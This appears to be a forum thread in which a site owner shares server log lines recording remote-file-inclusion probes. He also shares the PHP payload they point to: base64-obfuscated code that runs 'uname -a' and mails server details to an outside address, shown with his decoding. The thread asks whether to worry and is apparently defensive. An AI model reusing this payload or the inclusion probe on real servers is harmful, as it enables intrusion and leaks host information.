1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

What Is This?? Server Log Entry...

Discussion in 'BlackHat Lounge' started by unknown00, Jun 2, 2011.

  1. unknown00

    unknown00 Regular Member

    Joined:
    Jun 6, 2009
    Messages:
    212
    Likes Received:
    74
    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:44:21 (Date=0 EDT) libwww-perl/5.803

    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:44:22 (Date=0 EDT) libwww-perl/5.803

    IP: 67.85.53.112 |Date:
    -06-2011 / 07:44:56 (Date=0 EDT) Mozilla/5.0 (PLAYSTATION 3; 1.00)

    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:45:30 (Date=0 EDT) libwww-perl/5.803

    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:45:31 (Date=0 EDT) libwww-perl/5.803

    when i goto the above link im prompted to open/download a txt file which i do....
    and this is what it looks like

    Code:
    <?
    $win = strtolower(substr(PHP_OS,0,3)) == "win";
    echo "PLaTo<br>";
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
    {
     $safemode = true;
     $hsafemode = "4ON6";
    }
    else {$safemode = false; $hsafemode = "3OFF6";}
    $xos = wordwrap(php_uname(),90,"<br>",1);
    $xpwd = @getcwd();
    $OS = "<<".$hsafemode.">> ".$xos."";
    echo "<center><A class=ria href=\"http://".$OS."\">";echo "PLaTo</A></center><br>";
    echo "<br>OSTYPE:$OS<br>";
    echo "<br>Pwd:$xpwd<br>";
    eval(base64_decode("aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21v
    ZGUiKSkgPT0gIm9uIikgeyAkc2FmZW1vZGUgPSAiT04iOyB9IGVsc2UgeyAkc2FmZW1vZGUgPSAi
    T0ZGIjsgfSAkdmlzaXRvciA9ICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyAkZmxvYXQgPSAiRnJv
    bSA6IHZ1cmwgaW5mbyA8ZnVsbEBpbmZvLmNvbT4iOyAkYXJhbiA9IGV4ZWMoJ3VuYW1lIC1hOycp
    OyAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOyAkaW5qID0gJF9TRVJWRVJbIlJFUVVFU1Rf
    VVJJIl07ICRib2R5ID0gIkJ1ZyBodHRwOi8vIi4kd2ViLiRpbmouIm5uU3ByZWFkIFZpYSA6ICIu
    JHZpc2l0b3IuIm5uS2VybmVsIFZlcnNpb24gOiAiLiRhcmFuLiJublNhZmUgTW9kZSA6ICIuJHNh
    ZmVtb2RlOyBtYWlsKCJnd2FkdWtAZ21haWwuY29tIiwiU2V0b3JhbiBCb3MgIi4kc2FmZW1vZGUs
    JGJvZHksJGZsb2F0KTs="));
    die("<center> ByroeNet </center>");
    ?>
    when i decode the base64 this is what i get

    Code:
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "ON"; } else { $safemode = "OFF"; } $visitor = $_SERVER["REMOTE_ADDR"]; $float = "From : vurl info <full@info.com>"; $aran = exec('uname -a;'); $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Bug http://".$web.$inj."nnSpread Via : ".$visitor."nnKernel Version : ".$aran."nnSafe Mode : ".$safemode; mail("gwaduk@gmail.com","Setoran Bos ".$safemode,$body,$float);
    should i be worried???
     
  2. unknown00

    unknown00 Regular Member

    Joined:
    Jun 6, 2009
    Messages:
    212
    Likes Received:
    74
    no one have an idea??